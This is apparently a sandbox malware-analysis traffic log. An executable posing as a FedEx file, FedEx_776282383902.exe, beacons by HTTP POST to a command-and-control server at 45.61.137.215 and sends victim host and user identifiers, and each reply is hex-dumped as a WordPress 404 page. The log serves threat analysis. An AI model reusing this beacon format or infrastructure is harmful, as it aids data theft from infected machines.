                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:01:53.571342945 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                May 22, 2024 22:01:53.578866959 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                May 22, 2024 22:01:53.582813025 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                May 22, 2024 22:01:53.582827091 CEST448INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                May 22, 2024 22:01:53.582840919 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                May 22, 2024 22:01:53.582853079 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                May 22, 2024 22:01:53.594297886 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:01:53.598608971 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:01:53.598623991 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.74971045.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:01:53.733913898 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:01:53.784646034 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:01:57.011265039 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:01:54 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:01:57.011821032 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:01:57.012914896 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:01:57.012926102 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:01:57.015175104 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:01:57.016339064 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:01:57.016352892 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:01:57.016360998 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                May 22, 2024 22:01:57.018665075 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:01:57.019728899 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.74971645.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:01:57.173480988 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:01:57.224083900 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:00.492105007 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:01:57 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:00.493233919 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                May 22, 2024 22:02:00.495753050 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                May 22, 2024 22:02:00.498325109 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                May 22, 2024 22:02:00.498349905 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                May 22, 2024 22:02:00.498368979 CEST1236INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                May 22, 2024 22:02:00.503356934 CEST1236INData Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31
                Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
                May 22, 2024 22:02:00.505948067 CEST1236INData Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72
                Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
                May 22, 2024 22:02:00.505974054 CEST1236INData Raw: 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d
                Data Ascii: nous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--c
                May 22, 2024 22:02:00.511156082 CEST1236INData Raw: 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f
                Data Ascii: has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-g


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.74971745.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:00.654650927 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:00.696085930 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:03.367727995 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:01 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
